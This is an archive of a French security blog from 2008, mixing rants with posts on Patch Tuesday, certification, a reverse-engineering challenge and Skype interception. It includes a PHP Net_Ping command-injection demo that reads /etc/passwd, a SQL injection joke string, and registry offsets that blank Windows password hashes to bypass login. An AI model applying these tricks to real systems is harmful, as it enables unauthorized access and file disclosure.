mardi 23 décembre 2008

La Haine

Je comprends pourquoi Latex est principalement utilisé dans le domaine de la publication scientifique. C'est un outil totalement autiste et NON collaboratif, qui permet aux chercheurs de conserver un contrôle total sur l'information. A contrario, dans le monde de l'entreprise où l'échange de documents et le partage d'informations est une nécessité, Latex s'avère être un outil totalement inadapté.

Par exemple je rédige un rapport à plusieurs avec des collègues. Le client veut évidemment un document Word - un utilisateur non-geek (soit 99,999% de la population) étant totalement incapable d'apprendre le langage de programmation Latex et de recompiler un document, si toutefois il doit le modifier (ex. gestion documentaire) ou réutiliser une partie du contenu dans une présentation. Mais l'un des participants fait son malin et m'envoie un document Latex, rédigé sous Debian.

J'ouvre le fichier PDF avec Acrobat Reader pour le copier/coller dans Word. Echec (ou plus exactement \'echec, car Acrobat Reader semble avoir un problème avec les accents).

J'utilise Acrobat Pro qui dispose des options "Enregistrer sous ..." dans les formats DOC, HTML, TXT et d'autres. Echec également (toujours ce problème d'accents).

J'ouvre le fichier source. Echec (ou plus exactement échec, si vous voyez ce que je veux dire ...).

J'utilise Tex2Word. Echec, bien sûr. Le document utilise beaucoup trop de packages exotiques.

Finalement la seule solution sera d'utiliser un éditeur de texte compatible UTF-8, de copier/coller le source, puis de supprimer la mise en forme à l'aide de la fonction rechercher/remplacer.

Ensuite une passe de correction des typos s'impose. Je ne parle pas de la grammaire, car c'est un exercice difficile, mais bien des typos idiotes comme "scna" au lieu de "scan"). Et bien que les fanboys de Latex me parlent d'Aspell, il faut bien admettre que je n'ai jamais vu personne l'utiliser (ou alors ce logiciel est vraiment très mauvais).

Bien entendu, il sera totalement impossible de récupérer les graphiques PGF/TIKZ. Aucun autre outil au monde n'est capable de comprendre ce langage de description graphique.

Et voilà comment Latex tue la productivité et la collaboration. Mais cela aurait pu être pire car je n'ai pas eu besoin de recompiler le document. Or recompiler un document ailleurs que sur la machine d'origine est une tâche impossible, pour tout un tas de raisons comme les dépendances de packages, les jeux de caractères, etc. Faites le test sous Debian, Cygwin, OpenBSD puis OpenSolaris. Le simple problème de l'encodage du fichier texte est rédhibitoire.

Heureusement l'auteur initial du document a généré un code Latex relativement correct. Car le problème dans toutes les sectes, ce sont les adeptes de rang inférieur qui adhèrent au credo de la secte sans en comprendre les fondements. Dans cette population, on trouve les utilisateurs de Lyx ou TeXnicCenter par exemple. Ce dernier offrant plus de 2 Go de packages optionnels à installer, et la possibilité de sauvegarder dans la page de code Windows-1252, il est quasiment certain que le résultat produit ne sera pas réutilisable ailleurs.

Et croyez moi, un utilisateur qui dispose de tous les plugins Firefox, tous les Widgets Vista et tous les plugins GKrellM va installer tous les packages TeXnicCenter ...

Il n'est pas besoin de chercher très loin l'explication à cet état de fait. L'auteur de Latex étant salarié de Microsoft Research, on peut suspecter que Latex n'est qu'un projet destiné à tuer la crédibilité de toute alternative à Microsoft Office ... quoiqu'on m'a dit beaucoup de bien de Google Docs :)

vendredi 19 décembre 2008

WiFi Security Fail

Je cherchais du WiFi tandis que ma femme faisait du shopping dans Paris ... et là, c'est le drame.



A priori un routeur Linksys sans clé WEP ni WPA ... et un mot de passe par défaut sur l'interface d'administration ... Si son propriétaire ne s'est pas rendu compte du changement de SSID, c'est probablement qu'il ne sait même pas que son routeur a une fonction WiFi !

Voilà au moins quelqu'un qui n'aura pas de mal à prouver qu'il s'est fait piraté son WiFi, lorsque le décret d'application de la loi HADOPI sera publié !

Au passage, j'en ai profité pour essayer la géolocalisation par BSSID. Ca marche redoutablement bien à Paris (sauf sur cet exemple). Par contre ils n'ont pas les points d'accès 802.11a dans leur base de données :) 

dimanche 14 décembre 2008

Où va la sécurité ?

L'initiative sécurité de Microsoft est-elle un échec ?

Il n'a échappé à personne [sid][hdm] que le Patch Tuesday a été particulièrement prolifique ce mois-ci.

Par ailleurs, de nouvelles failles non corrigées sont exploitées "dans la nature" [Wordpad][IE] et [MS-SQL, dont je n'ai pas trouvé trace ailleurs] dès le lendemain - une technique qui vise à maximiser la surface d'exposition des cibles.

Est-ce donc un échec du SDL ? Les Mécapoulets sont-ils grillés ?

Il est très difficile de répondre à cette question car le "marché" des vulnérabilités se brouille de plus en plus.
  • Il est évident que le code dit "hérité" (c'est-à-dire le code écrit par des développeurs partis à la retraite avec leurs stock-options) est beaucoup plus difficile à corriger et à maintenir. La majorité des failles trouvées ces dernières années affectent des parsers dans des applications clientes "lourdes" et de conception ancienne (Office, Internet Explorer, Windows Media, etc.). Ce type de code est un puit sans fond pour la recherche de failles, que ce soit par analyse statique, ou par fuzzing. Il n'y a qu'à tenter de lire les spécifications du format Office pour se rendre compte de l'impossibilité d'écrire un parser correct.
  • Microsoft a tout intérêt à produire de "gros" patches, car celà minimise le downtime dû au reboot pour les clients, mais également le nombre de bulletins publiés chaque année (une métrique absurde s'il en est, pourtant largement employée car facilement accessible). Ce qui explique peut-être la lenteur avec laquelle certaines failles sont patchées.
  • La criticité des failles est également discutable. Par exemple l'une des failles patchées par MS08-073 n'est exploitable que sur Internet Explorer 5.01 ...
A ce sujet, et sans rentrer dans les détails techniques, seuls 2 patches me semblent réellement intéressants ce mois-ci : MS08-076 et MS08-077. En effet, tous les autres sont des corruptions mémoire sans innovation technique.

MS08-076 est une faille probablement détectée en interne chez Microsoft (aucun crédit n'étant donné), qui transpose l'attaque par réflexion de crédences aux codecs Windows Media. La deuxième faille concerne la fuite d'authentifiants NTLM via le protocole ISATAP (un mécanisme de transition IPv6). Pas le genre de technologies qui suscitent beaucoup d'intérêt chez les bugs hunters, et pourtant des failles qui ne nécessitent pas une ligne d'assembleur à exploiter, donc beaucoup plus fiables que la moyenne, et totalement indétectables par les outils de sécurité déployés aujourd'hui en entreprise.

C'est à se demander si les chercheurs de failles veulent réellement exploiter leurs découvertes, ou juste gagner de l'argent et/ou du crédit avec.

MS08-077 est une faille de contournement du contrôle d'accès dans le portail SharePoint 2007. Tous ceux qui ont déjà touché de près ou de loin à cette plateforme apprécieront à sa juste valeur la complexité d'une telle découverte.

MS08-067

Ce Patch Tuesday de décembre ne bouleverse finalement pas le paysage en matière de sécurité : des failles côté client, des patches à passer, des redémarrages planifiés, des codes d'exploitation laissés aux tâcherons de l'underground, dans des pays où le développement d'un outil d'exploitation complet coûte $50/mois.

La faille la plus significative de cette année 2008 reste à mon sens MS08-067. Une faille exploitable à distance sans authentification, et nous voilà revenus 4 ans en arrière au temps de Blaster et Sasser.

La seule chose qui a empêché le crash de l'Internet mondial, ce sont les filtrages et/ou la NAT déployée par les FAI depuis. Mais dans les entreprises, l'atterrissage a été douloureux. Le patch n'a pas été identifié comme suffisamment critique pour arrêter la production. Les antivirus, tout comme les soi-disantes solutions de "0day protection", n'avaient pas les bonnes signatures (sic). Les portables et les clés USB continuent d'entrer et sortir du réseau local sans contrôle. Et là, c'est le drame. Heureusement que les payloads embarqués dans les vers actuels, tels que Win32/Conficker, se contentent d'actions insignifiantes telles que voler des authentifiants pour WoW !

Je n'ai évidemment aucune information sur le sujet, mais lorsque l'armée américaine prétend être victime d'une attaque extrêment complexe, provenant des services russes, et l'obligeant à interdire l'usage des clés USB sur ses réseaux, je crains qu'il ne s'agisse que d'un ver très banal mais redoutable sur un réseau qui n'a jamais été exposé au feu d'Internet ...

Le test d'intrusion est-il mort ?

Dans le même ordre idée, l'article "Penetration Testing: Dead in 2009" m'a encore beaucoup navré.

D'abord, parce que le test de pénétration régulier fait partie intégrante de presque toutes les "normes" en sécurité (PCI/DSS, ISO 2700x, et autres), et que ces normes ne vont pas disparaitre en 2009.

Mais surtout parce que l'article est en fait une interview de la société Fortify, spécialisée dans l'audit de code source. Et même en supposant que leur outil soit parfait, qu'il soit utilisé dans tous les produits d'ici fin 2008, et que tous les utilisateurs mettent à jour en 2009 avec les produits corrigés, il faudra bien alors admettre que le (bon) test d'intrusion n'a rien à voir avec l'exploitation de failles d'implémentation ...

Les failles d'implémentation connues:
  • Sont facilement détectables par les scanners de vulnérabilités ;
  • Peuvent être corrigées rapidement par les patches de l'éditeur ;
  • Ne marchent pas dans la vraie vie (Windows 2008 64-bit anyone ?).
Quant au cas des failles inconnues (souvent appelées "0day"), leur cas est vite évacué car trop peu d'auditeurs en disposent, et l'effort de développement sur les plateformes modernes est trop important dans le cadre d'audits réguliers ou d'audits de conformité. Les tests "free for all", seuls applications possibles de ces failles, sont très rares puisque la plupart des entreprises ne passent déjà pas les cas simples.

Le cas PHP est bien entendu à part, puisque le coût d'une faille include est souvent marginal :)

Il est beaucoup plus intéressant dans le cadre d'un test d'intrusion d'identifier des problèmes simples (ex. compte sans mot de passe), susceptibles d'être exploités par des codes automatiques ou des employés malveillants. Ou encore des failles de conception, qui nécessitent de remettre à plat une architecture réseau ou un produit.

Si vous arrivez à persuader un service informatique qu'il est absolument nécessaire d'activer la signature SMB pour contrer les attaques en réflexion de crédences, le test a servi à quelquechose. Sinon, le client restera vulnérable à une faille de conception des protocoles LM et NTLM qui garantit le "succès" de tout test de pénétration ultérieur (sauf si l'auditeur est mauvais, ce qui peut être une conclusion intéressante).

Quel modèle de marché pour les failles ?

Dans ces conditions, la recherche de failles apparait plus comme une activité intellectuelle et ludique que comme la seule et unique source d'intrusion en 2009.

Les américains, prompts à quantifier et à titriser, tentent depuis longtemps d'assigner une valeur monétaire aux "0day" pour imaginer dompter la bête (voir à ce sujet le débat lancé sur la liste Daily Dave -  il est vrai que la société Immunity ne tarit pas d'éloges sur les vertus du "0day") .

Compte-tenu du fait que la loi du marché à tout prix a provoqué la crise mondiale que l'on sait, j'ai du mal à voir comme un marché du "0day" va stimuler la sécurité informatique du côté défensif ... D'autant que les pratiques dans le domaine ne sont déjà plus très étiques, et que les pirates résidant en dehors du "monde libre" sont peu susceptibles de vendre à des américains.

D'autres chercheurs de failles (européens: [WSLabi][Vupen]) se tournent vers les vendeurs d'IDS/IPS : "achetez tel produit car c'est le seul à vous protéger contre la dernière faille dans Internet Explorer, dont seuls les chinois disposent !". Tant d'années au service de la sensibilisation des utilisateurs et des bonnes pratiques pour entendre ça ... c'est triste. Si personne ne surfait sous le compte "administrateur", on en serait pas là. Heureusement que d'autres prédisent la mort des IDS/IPS en 2009 :)

D'ailleurs Snort s'oriente vers la fonction de "Passive Vulnerability Scanner" plutôt que vers la détection hardcore, vouée à l'échec.

Voilà, c'est tout pour aujourd'hui. Si vous en voulez plus, il faudra voter pour ma soumission à SSTIC. Ah non je dois confondre avec BlackHat, le processus de sélection des soumissions à SSTIC reste totalement obscur pour moi :)

lundi 8 décembre 2008

Mise à jour du troll Latex

Quand on voit ceci, peut-on réellement croire "qu'au moins, Latex est l'outil respectant le plus les règles typographiques et la mise en page des documents" ?


(Source: newsletter n°48 du CERTA. Oui j'aime bien lire les newsletters :)

mercredi 3 décembre 2008

Ceci n'est pas du sport ...

... mais ça pourrait le devenir.

Et oui, pour les béotiens qui confondent Evaluation et Certification, sachez que ESPN est un site sportif de premier plan, tandis que CSPN est une nouvelle initiative du gouvernement français.

Qu'ils soient pardonnés, car il n'est pas facile de s’y retrouver dans la profusion d'annonces autour de la "sécurité" (telles que la plateforme Internet Signalement ou les gesticulations autour de la loi HADOPI).

L’objectif de la Certification Sécurité de Premier Niveau est louable : il s’agit de vérifier que des fonctions de sécurité essentielles sont assurées par un produit d’usage courant, en temps et en budget contraint – d’aucun parlerait de certification "agile", par opposition aux évaluations de type Critères Communs. Ces dernières ne sont praticables que sur des systèmes très contraints, toute autre tentative étant vouée à l’échec.

Bien entendu, on peut débattre à l’envi des conditions dans lesquelles cette certification a été mise en œuvre. Par exemple tous les CESTI sont automatiquement devenus évaluateurs potentiels pour la CSPN. On conçoit mal qu’un laboratoire capable de délivrer une certification EAL4 à un VPN ne puisse pas vérifier la solidité du chiffrement de WinZip. Mais on imagine quand même que le processus de certification Critères Communs, impliquant une forte coopération de l’éditeur, est assez différent d’une évaluation de 20 jours parfois sans accès au code source.

Les premiers résultats de cette certification étant tombés, on peut également être surpris par le choix des produits certifiés : Trango Hypervisor, Blancco Data Cleaner, et TrueCrypt. Si le choix de ce dernier est assez logique, les deux premiers sont quasi-inconnus et bénéficient d’une publicité d’enfer via un site institutionnel, qu'ils ne se privent pas d'exploiter - le tout pour une somme assez modique (20 jours de consultant). Trango venant d'être racheté par VMWare, et Blancco étant une société Finlandaise, on ne voit pas trop l'intérêt pour la DCSSI de s'engager dans cette voie.

Parmi les détails amusants, on notera la référence à FrSIRT (page 16) comme portail de référence (son propriétaire n’ayant pourtant pas toujours été en odeur de sainteté dans les sphères gouvernementales) – et on notera aussi que Sogeti n’a pas rendu son rapport définitif. C’est probablement comme le SSTIC – il y a du rab’ pour ceux qui galèrent avec Latex :)

Bien entendu, le challenge consiste maintenant à mettre en défaut la certification d’un produit, malgré l’avertissement chapeau assez explicite :
"La certification ne constitue pas en soi une recommandation du produit par la Direction centrale de la sécurité des systèmes d’information (DCSSI), et ne garantit pas que le produit certifié soit totalement exempt de vulnérabilités exploitables."

Dans la pratique, ça n’est pas aussi simple : les rapports des produits certifiés font déjà état de failles avérées dans certaines configurations. Par exemple le produit d’effacement sécurisé ne sait pas accéder à la zone HPA sur les disques IDE, alors qu’il y parvient sur les disques SATA !

Tout comme pour les critères communs, la certification obtenue doit être replacée dans le contexte de la cible de sécurité. Dans ces conditions, la probabilité de trouver une faille qui aurait échappée au certificateur est beaucoup plus faible.

Et les produits qui échouent lamentablement à passer la certification n'apparaissent nulle part - tout est bien qui finit bien, donc :)

Passons maintenant au jeu de la newsletter, à l’aide du script Python suivant :

fp = open("newsletter52.txt", "ra")
all = fp.readlines()
fp.close()

count = 0
for l in all:
words = l.split(" ")
for w in words:
if ((len(w) == 5) and (w.startswith("270"))):
count = count + 1

print "Score: %d" % count
Verdict: 44. On atteint le high score, mais sans le dépasser !

Vous noterez au passage le laconique :

- Outil : Nouvelle version de l'outil de tunnel sur DNS, dns2tcp v0.4.3.
http://www.hsc.fr/ressources/outils/dns2tcp/index.html.fr

En vérité, il s’avère que les versions 0.4.0, 0.4.1 et 0.4.2 étaient toutes vulnérables à des failles de sécurité, ce que n’indique pas vraiment le site de l’éditeur.

Le scénario est assez classique dans le monde de la sécurité : tout le monde se dit "c’est du sérieux, on peut avoir confiance" ou "quelqu’un a sûrement regardé, puisque c’est Open Source" (sic).

Puis un jour, survient l’integer overflow – et là, c’est le drame. Car cela signifie que ni le développeur, ni sa toolchain n’a connaissance de cette classe d’attaque. Et les bogues n’ont pas manqué de s’enchainer rapidement par la suite.

Il faut dire que le co-auteur de cet outil a été sévèrement châtié : il est désormais assigné à la formation "Développement sécurisé en PHP par la pratique". Personne n’a mérité ça, pas même les mainteneurs Debian.

En parlant de PHP, voici un exemple de code PEAR :

$ cat lol.php

require ("Net/Ping.php");
$count=1;
$host='127.0.0.1';
$ping = Net_Ping::factory();
$ping->setArgs(array('size' => 1, 'count' => $count));
$response = $ping->ping($host);
echo join("\r\n", $response->getRawData());
?>

$ php5 -f lol.php
PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.
9 bytes from 127.0.0.1: icmp_seq=1 ttl=64

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

Et voici ce qu'il m'a fallu 5 minutes pour trouver lors d'un audit quelconque:

$ cat lol.php

require ("Net/Ping.php");
$count=1;
$host='127.0.0.1;head /etc/passwd';
$ping = Net_Ping::factory();
$ping->setArgs(array('size' => 1, 'count' => $count));
$response = $ping->ping($host);
echo join("\r\n", $response->getRawData());
?>

$ php5 -f lol.php
PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.
9 bytes from 127.0.0.1: icmp_seq=1 ttl=64

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh

Même dans la Livebox, on ne trouve plus ce genre de faille !


« Depuis que PHP a été inventé, je n’ai plus besoin de remplir mes rapports avec ‘le routeur a répondu à ICMP Timestamp’ ou ‘le serveur autorise la méthode non sécurisée TRACE’ » -- various pentesters.

mercredi 10 septembre 2008

On a frôlé le Big One(tm)

... la question est: "lequel ?" :)


Je ne parle donc pas de la mise en service du LHC, mais bien de la cryptographie dans les versions françaises de Windows, qui par une sorte d'exception culturelle, a toujours été beaucoup plus faible.

On apprend donc dans cette note du CERTA qu'un patch est désormais disponible pour le Protected Storage. Contrairement au High Encryption Pack pour Windows 2000, ce patch s'applique également à Windows XP SP2 et 2003 qui disposaient encore de quelques portions de code "peu entropiques".

Voyons ce que cela donne sur un Windows XP SP2 FR complètement à jour. Nous allons pour cela utiliser l'outil gratuit PatchDiff2.

Après installation, un seul fichier est modifié: pstore.dll

Dans ce fichier, une fonction a été supprimée (IsEncryptionPermitted), une autre a été ajoutée. Soit.


Voyons maintenant les fonctions qui ont été modifiées: elles sont au nombre de 8.


Prenons la première: FMyEncryptKeyBlock. Un seul bloc fonctionnel a été modifié.

Même si vous ne lisez pas bien l'assembleur, je pense que vous avez une petite idée de ce qui se passe ...

Au fait, à quoi sert le Protected Storage ? A stocker un peu tous les mots de passe qui trainent ... Heureusement il est deprecated à partir de Vista.

En conclusion:
  • Difficile de se moquer de Debian après ça.
  • Il ne faut pas croire que "d'autres ont audité le binaire, et s'il y avait quelquechose ça se saurait".
A part ça quoi de neuf ? C'est presque la routine: patch Microsoft pour 5 failles GDI+, failles dans Wordpress, Apple QuickTime, mDNSResponder/Bonjour, Google Chrome ... Mais on attend toujours le Big One.

dimanche 7 septembre 2008

Bâches, suite (ou comment finir le challenge T2 en 2 minutes)

Et oui, j'ai rattrapé quelques flux RSS de retard pendant ce week-end pluvieux :)


1. Tout d'abord le piratage. Il est responsable de tous les maux, comme d'habitude. Mais de là à déclarer:
(...) selon Henri Dumoulin, responsable de Pathé Nord. « Le piratage nous a joué un petit tour », a-t-il déclaré à l'AFP. « En 1998 (date de sortie de Titanic), il n'y avait pas d'internet à haut débit. »
... il y a un pas.

2. Un cas d'école de fuite d'information.


Je vous fait grâce de mon avis sur les réponses obtenues, par contre j'aime bien ce passage:
I am reminded as a result of reading your note on new Cyber strategies, about a place I used to work that constructed aerospace components for the many companies that offered their goods to the USA military machine. One of these devices were housings machined to contain the electronics which was capable of jamming the navigation signal of the French Exocet missile.

When the target, usually a ship, is acquired from the radar of the jet fighter, the navigation was transferred to the missile's gyro system so that once released from under the wing of the fighter, the missile was on it's own to reach it's designated target. Raytheon, a Canadian designer of anti aircraft and anti missile electronics developed a signal to send to the incoming missile that would instruct the missile to turn around and return to the jet from whence it came. Needless to say the pilot would have a sudden digestive problem once it became known the missile he just launched was coming back for a visit.
3. Et enfin, le challenge T2.

Pour mémoire, il s'agit d'un challenge annuel de reverse enginnering, qui attire chaque année un grand nombre de participants de qualité, même s'il n'y a rien à gagner (à part un aller-retour en Finlande). C'est probablement le manque du challenge Securitech qui se fait sentir :)

Le challenge 2008 a commencé samedi matin à 9h, heure française. L'objectif est un peu différent des années précédentes, puisque cette fois-ci l'objectif est de retrouver une adresse email cachée dans un Tetris 3D.

Par curiosité, je télécharge et je lance l'exécutable sur mon Vista 32-bits. Comme souvent avec ces challenges bourrés d'astuces Windows, rien ne se passe. Il y a probablement des valeurs spécifiques à Windows XP SP2 "en dur" dans le programme.

Toutefois un processus "challenge.exe" est présent en mémoire, Vista va donc me permettre (via le Task Manager) de créer un fichier de vidage au format "minidump applicatif".

A tout hasard, je cherche une adresse email (toujours faire simple avant de chercher compliqué ;) :

C:\> strings -n 8 Challenge.DMP | findstr @ | more
(...)
Please, contact support@oreans.com. Thank you!
(...)

Oreans.com ... Les auteurs du packer Themida ?

Il suffit d'attacher KD et de consulter le DebugView pour s'en rendre compte:

Waiting to reconnect...
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
Kernel Debugger connection established.
Symbol search path is: SRV*C:\WINDOWS\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
Windows XP Kernel Version 2600 UP Free x86 compatible
Built by: 2600.xpsp_sp2_rtm.040803-2158
Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
System Uptime: not available
ERROR: DavReadRegistryValues/RegQueryValueExW(4). WStatus = 5
ERROR: DavReadRegistryValues/RegQueryValueExW(5). WStatus = 5
ERROR: DavReadRegistryValues/RegQueryValueExW(6). WStatus = 5
SYNC:DriverEntry.
SYNC:DriverEntry - Done.

%s------------------------------------------------
---          Themida Professional            ---
---      (c)2007 Oreans Technologies         ---
------------------------------------------------

watchdog!WdUpdateRecoveryState: Recovery enabled.

Et oui ! Cette année le challenge T2 consiste simplement à dumper un binaire protégé par Themida. Désolé les gars, mais si vous voulez une évaluation de votre protection commerciale par des experts du domaine, je peux vous envoyer une propale ...

vendredi 5 septembre 2008

Il pleut des bâches

Petit florilège du vendredi soir ...


1. D'abord, l'une de mes banques en ligne.

Il semble qu'elle prenne très au sérieux le risque des malwares sur téléphones portables. Je ne me risquerai pas à dire qu'il s'agit de pur FUD, n'ayant pas toutes les cartes en main (si quelqu'un a déjà vu un virus mobile "en vrai", qu'il me contacte !).

Dans tous les cas, l'article est rédigé dans un style tellement technique qu'il rebutera immédiatement la moindre ménagère de moins de 50 ans.

Et surtout, avant qu'un téléphone soit suffisamment puissant pour pouvoir interpréter la page d'accueil de cette banque, il y a de la marge !


Pour le coup, l'information est accessible au commun des mortels. Le graphisme est lêché, la mise en page est aérée, on sent qu'il y a du produit à vendre derrière (contrôle parental, antivirus, support sur site et tout le tremblement - on parle de pack 6-en-1 ici !).

Le partenariat avec F-Secure est difficile à rater. D'ailleurs vous pouvez même installer leur ActiveX.

Au final, le chaland n'a rien compris, mais il s'est fait peur avec la carte de propagation en temps réel de NSAnti.Packed ou VB.Trojan-Downloader. Et si mon pâté de maison était dans la zone d'infection du virus ?

3. Les consultants certifiés CISSP

Bon là c'est certes un peu facile. Mais comme le faisait remarquer un ami (lui-même CISSP), le nouveau certifié prête serment sur la Bible de suivre le code d'éthique du CISSP. Les valeurs de ce code sont simples: d'abord la patrie, ensuite le business.

D'ailleurs tout consultant CISSP a répondu lors de l'examen que s'il voyait son patron faire du P2P (et donc alimenter les caisses du terrorisme international en 2003 comme en 2008), il jouerait son rôle de whistleblower sans états d'âme.

Vous l'aurez compris, c'est une certification américaine.

4. Et pour finir, Hakin9 est arrivé

Il n'y a pas grand'chose à ajouter, si ce n'est qu'un pilier de la sécurité informatique française m'a récemment recommandé d'écrire dans Hakin9. Et qu'on ne dit pas "crypter" en français.

mercredi 3 septembre 2008

Free fail


Espérons que l'infâme ' OR DROP DATABASE clients; -- ne se soit pas abonné chez Free !

dimanche 31 août 2008

C'est aujourd'hui ...

La journée mondiale du blog !

Malheureusement, je n'ai pas eu le temps de beaucoup poster en août, compte-tenu de la charge de travail que représente le coaching de jeunes stagiaires plein d'allant, et d'une activité professionnelle somme toute soutenue pour la saison.

Notez que c'est un peu pareil pour Cédric, qui a déjà quelques conférences de retard dans ses compte-rendus.

En parlant de conférences, il semble que The Big One (comprenez la faille DNS de Kaminsky) a occulté une autre opération de communication pourtant assez rondement menée: le concours race to zero. Si vous avez complètement oublié de quoi il s'agit, et que vous n'avez pas pensé à aller voir les résultats, rassurez-vous: plusieurs équipes ont réussi à contourner tous les antivirus en quelques heures [1] [2].

Le détail amusant, c'est que ce concours était sponsorisé par un éditeur antivirus qui a pu se targuer de détecter tous les échantillons modifiés à l'aide de son produit. En effet, ce produit est basé sur le whitelisting d'exécutables ...

L'année prochaine, il n'y a qu'à organiser un concours race to zero day, et voir comment se comporte le produit en question face à une exploitation de faille tout en mémoire, ou de faille noyau ...

Décidément ces conférences américaines alimentent de plus en plus l'image Security Circus du métier !

vendredi 22 août 2008

Marketum Echecum

Vu dans la newsletter des cinémas Pathé/Gaumont.


Enfin ça fait 3 ans que cette page est en ligne, donc de toute façon personne ne doit lire ces trucs là.


Message pour ceux qui pourraient se poser la question: c'est un passage des Métamorphoses d'Ovide.

mercredi 6 août 2008

Réflexions post-SSTIC

Mise à jour du 7 août : Damien Aumaitre m'a contacté pour me dire que sa technique n'a rien de secrète. Du coup je publie la réponse complète :)

Et oui le SSTIC 2008, à l'échelle numérique, ça semble déjà appartenir au paléolithique ...

Mais voici deux questions issues de cette conférence auxquelles j'ai réfléchi par la suite:

1. Concernant l'extension Firefox malicieuse présentée en Rump Session, et dont le code n'a pas été diffusé (à ma connaissance), je suis tombé là dessus par hasard en lisant le dernier Hackers News Magazine (fear).

2. Concernant la modification de la base de registre permettant de contourner l'authentification Windows, présentée pendant la conférence de Damien Aumaitre, voici quelques explications.

Tout d'abord il faut savoir sous Windows que les comptes locaux sont gérés dans la base SAM. Cette base est visible dans la base de registre, les clés qui nous intéressent étant:
HKLM\SECURITY\SAM\Domains\Account\Users\

(Ces clés ne sont visibles que pour le compte SYSTEM par défaut, il vous faudra changer les permissions pour y avoir accès).

Ces clés contiennent deux valeurs binaires mystérieuses: F et V. En regardant SAMSRV.DLL (avec les symboles de débogage), on se rend compte que ces clés sont nommées en interne _SampFixedAttributeName et _SampVariableAttributeName, ce qui est un peu plus explicite.

Parmi les quelques fonctions qui référencent ces chaines, on trouve la fonction CreateUser() qui permet de reconstituer l'essentiel de la structure de ces clés.

La structure F est de la forme:
ULONG version;
ULONG unk1;
time_t LastLogon;
time_t LastLogoff;
time_t LastPasswordSet;
time_t ExpirationDate;
time_t LastPasswordFailed;
ULONG uid;
ULONG gid;
ULONG options;
// différents compteurs (ex. login attempts) ?
USHORT unk2;
USHORT unk3;
[...]

Rien d'intéressant a priori. La structure V est un peu plus complexe, puisque de taille variable. Elle commence par une liste de structures de type:
ULONG offset;
ULONG length;
ULONG additional_data; // souvent zéro


Puisque viennent les données proprement dites, comme le nom d'utilisateur, la description du compte, les hashes (chiffrés), etc.

La manipulation de la SAM est effectuée par des API telles que RtlAddAttributeActionToRXact(), RtlAddActionToRXact(), RtlApplyRXact(). Ces API garantissent que la modification de la base de registre, et donc la création du compte, s'effectuera de manière unitaire.

Inutile d'aller plus loin dans l'analyse, puisque tout est documenté sur ce site (attention, la mise en page pique un peu les yeux* :). Voici les liens directs vers la clé F et la clé V.

[*] Pas autant qu'un post d'Ivanlef0u, mais presque.

Dans mon souvenir, la manipulation consistait à remplacer un octet 0x14 par un octet 0x04 dans la clé V. Echec.

En fait, l'auteur me signale qu'il faut remplacer les deux valeurs aux offsets 0xA0 et 0xAC, ce qui a pour effet de dire au système que les hashs LM et NTLM sont de longueur nulle. Et là, "ça marche chez moi" (Windows XP SP2 FR / Workgroup / Fast User Switching).

PS. Je me demande bien à quoi sert la fonction _SampFixBug18471()

PPS. Inutile de paniquer sur la présence d'une variable globale _SampSecretEncryptionEnabled, c'est juste pour dire que SYSKEY est activé.

mardi 5 août 2008

Marketing fail

Vu dans la newsletter Nature & Découvertes:


Pour info, le Tarpé est une bâche, en fait.

PS. Vous pouvez me trouver sur Twitter maintenant. Web 2.0 forever.

PPS. Promis je prépare des posts techniques et intéressants pour bientôt :)

dimanche 27 juillet 2008

Les backdoors dans Skype

Un récent article au titre racoleur prétend qu'il existe des backdoors dans Skype, permettant aux forces de police d'écouter les conversations.

Au delà du FUD, il me semble évident (compte-tenu des informations disponibles publiquement) qu'il est possible d'écouter une conversation Skype.

Parmi les arguments qui plaident en faveur de cette hypothèse:

  • La présence de failles exploitables à distance dans le logiciel. Dont la nôtre :)
Ceci dit, même si les polices française et allemande (entre autres) ont des velléités de "piratage légal", un ex-français travaillant dans la sécurité informatique offensive pourrait confirmer que les "services" sont encore loin du "remote 0day dans Skype" ...
  • Le mécanisme d'authentification, basé sur une signature RSA, repose sur le jeu de clés Skype.
Il a déjà été démontré (cf. slides 101+) que le remplacement de ces clés dans un client Skype "malveillant" (par exemple, via la fonction de mise à jour automatique[*]) permettait de faire tourner un réseau totalement indépendant du réseau "officiel". Le point de connexion entre le réseau "officiel" et le réseau "parallèle" simule un client Skype et peut avoir accès à toutes les communications en clair (attaque en homme du milieu).

Bien entendu si Skype coopère en donnant accès à ses clés privées, c'est encore plus simple.
  • Le système de plugins permettant d'étendre les fonctionnalités du logiciel n'est pas sûr.
En effet, lors de l'ajout d'un nouveau plugin, une confirmation utilisateur est demandée. Mais cette confirmation ne fait qu'ajouter une entrée dans la liste des plugins, authentifiée par un "code de validation". Ce code n'est en aucun cas une signature, et n'importe qui connaissant l'algorithme peut le recalculer. Un malware pourrait donc installer silencieusement un plugin Skype.

Compte-tenu des conférences passées présentant les méthodes de travail de la police, la solution du piégeage semble être la plus couramment utilisée.
  • Enfin, de nombreux pays imposent aux opérateurs télécom la mise en place d'un mécanisme de Lawful Interception. On ne voit pas pourquoi une société américaine aussi importante (Skype est une société du groupe eBay) pourrait décider de se soustraire à cette obligation.
Maintenant chacun fait ce qu'il veut. Mais vous ne pourrez pas dire que vous ne saviez pas.

La question qui reste en suspens est: y a-t-il une bonne vieille backdoor dans Skype, permettant de prendre le contrôle de n'importe quel client à distance ? Un simple netstat -an devrait permettre de répondre à cette question ;)


[*] La fonction de mise à jour automatique est une simple connexion HTTP. Par exemple chez moi:
GET /ui/0/3.6.0.216/fr/getnewestversion?ver=3.6.0.216&uhash=1b37a59b72b99a9ff8158cb6e084efb86 HTTP/1.1
User-Agent: Skype. 3.6
Host: ui.skype.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 27 Jul 2008 12:40:59 GMT
